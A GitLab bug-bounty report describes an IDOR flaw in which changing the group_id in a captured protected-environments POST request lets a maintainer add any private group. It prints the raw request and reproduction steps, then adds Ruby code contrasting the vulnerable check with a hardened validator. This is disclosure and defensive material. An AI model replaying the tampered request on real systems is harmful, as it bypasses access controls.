
IDOR in adding groups to protected environments

HackerOne report #566216 by ashish_r_padelkar on 2019-05-04, assigned to estrike:

Summary

Hello,

This issue is similar to https://gitlab.com/gitlab-org/gitlab-ce/issues/52409. However, there is no API for protected environments that leaks these group names yet, but I think you should fix this before any API is released for them.

There is an IDOR issue when adding groups to a protected environment: any private group can be added.

Steps to reproduce

  1. As a project Maintainer, go to `https://gitlab.com///settings/ci_cd#js-protected-environments-settings1`

  2. First add any group that is already shared with this project to the protected environment, and capture the request below.

POST /<UserName>/<ProjectName>/protected_environments HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 213  
Accept: application/json, text/plain, */*  
Origin: https://gitlab.com  
X-CSRF-Token: 1  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Referer: 1  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: 1

{"authenticity_token":"1","protected_environment":{"name":"qqqqqqw","deploy_access_levels_attributes":[{"group_id":4962333}]}}  
  3. Now change the value of the group_id parameter in the above request to a private group ID.

  4. This will add the protected environment.

  5. You can verify that the group has been added by inspecting the element in the browser, as below:
     (attachment: Screenshot_2019-05-04_at_17.22.42.png)

What is the current bug behavior?

IDOR which allows adding any private group to protected environments

What is the expected correct behavior?

Only groups that are shared with the project should be allowed.

Output of checks

This bug happens on GitLab.com and probably on omnibus installations too!

Regards,
Ashish

Impact

IDOR in adding any group to protected environments. This doesn't reveal the group name yet, as there is no API for protected environments, but I think you should fix this before you implement one!
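The expected behaviour the report asks for ("only groups shared with the project should be allowed") amounts to a server-side authorization check on every `group_id` in `deploy_access_levels_attributes`. The following is an added illustration, not GitLab's own code: it parses a constructed copy of the request body from the report, shows the unchecked extraction that the IDOR relies on, and beside it a hardened validator that partitions the requested group IDs into accepted and rejected based on an assumed `Project` struct carrying the IDs of groups shared with the project (the struct, the `999999` group ID and the function names are assumptions for the example).

```ruby
require 'json'
require 'set'

# Constructed copy of the JSON body captured in the report. The group_id value
# is the one shown in the report; nothing else here is a real identifier.
SAMPLE_BODY = '{"authenticity_token":"1","protected_environment":' \
              '{"name":"qqqqqqw","deploy_access_levels_attributes":[{"group_id":4962333}]}}'

# Hypothetical stand-in for a project record: the only fact the check needs is
# the set of group IDs that have been invited to (shared with) the project.
# This shape is assumed for the example, not GitLab's data model.
Project = Struct.new(:id, :shared_group_ids)

# Vulnerable behaviour (what the report describes): every group_id present in
# the request is taken at face value, so any private group ID is accepted.
def extract_group_ids_unchecked(body)
  params = JSON.parse(body)
  levels = params.dig('protected_environment', 'deploy_access_levels_attributes') || []
  levels.filter_map { |level| level['group_id'] }
end

# Hardened behaviour: a group_id is accepted only when that group is shared
# with the project. Returns [accepted_ids, rejected_ids]; a controller would
# refuse the whole request (for example with a 422) when rejected_ids is
# non-empty rather than silently persisting the accepted subset.
def validate_group_access_levels(body, project)
  allowed = project.shared_group_ids.to_set
  requested = extract_group_ids_unchecked(body)
  requested.partition { |group_id| allowed.include?(group_id) }
end

if __FILE__ == $PROGRAM_NAME
  project = Project.new(1, [4962333])
  # Legitimate request: the group is shared with the project.
  puts validate_group_access_levels(SAMPLE_BODY, project).inspect
  # Tampered request: group_id swapped for an unrelated ID (999999 is a constructed placeholder).
  tampered = SAMPLE_BODY.sub('4962333', '999999')
  puts validate_group_access_levels(tampered, project).inspect
end
```

The point of returning both lists rather than silently filtering is that a tampered request should fail loudly: silently dropping the unauthorized ID would hide probing of group IDs from logs and from the user, while a rejection is something a detection rule can alert on.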
